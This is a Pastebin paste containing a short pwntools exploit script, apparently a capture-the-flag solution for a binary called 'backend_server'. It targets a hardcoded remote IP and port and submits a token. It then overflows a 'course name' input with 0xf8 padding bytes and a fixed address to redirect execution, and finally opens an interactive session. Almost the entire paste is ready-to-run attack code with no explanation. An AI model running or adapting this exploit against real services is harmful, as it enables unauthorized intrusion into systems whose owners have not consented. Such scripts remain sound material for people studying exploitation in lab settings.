Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
- # libc = ELF('')
- elf = ELF('./backend_server')
- context(os='linux', arch=elf.arch)
- context(log_level='debug') # output verbose log
- RHOST = "178.128.84.72"
- RPORT = 9997
- LHOST = "127.0.0.1"
- LPORT = 9997
- def section_addr(name, elf=elf):
- return elf.get_section_by_name(name).header['sh_addr']
- def dbg(ss):
- log.info("%s: 0x%x" % (ss, eval(ss)))
- conn = None
- opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
- if opt in 'rl':
- conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
- elif opt == 'd':
- gdbscript = """
- continue
- """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
- conn = gdb.debug(['./backend_server'], gdbscript=gdbscript)
- else:
- conn = process(['./backend_server'])
- # conn = process(['./backend_server'], env={'LD_PRELOAD': ''})
- if opt == 'a': gdb.attach(conn)
- # exploit
- log.info('Pwning')
- token = 'c96ad7c54d14a76b9a940d662b18efa77637c2451d8363aa93159d130f4c712f'
- conn.sendlineafter('Token>', token)
- conn.sendlineafter('What is the course name?>', 'hoge')
- conn.sendlineafter('What is the course name?>', 'hoge')
- conn.sendlineafter('What is the course name?>', 'hoge')
- payload = 'x'*0xf8 + p64(0x604070)
- conn.sendlineafter('What is the course name?>', payload)
- conn.sendline('3')
- conn.interactive()
Add Comment
Please, Sign In to add comment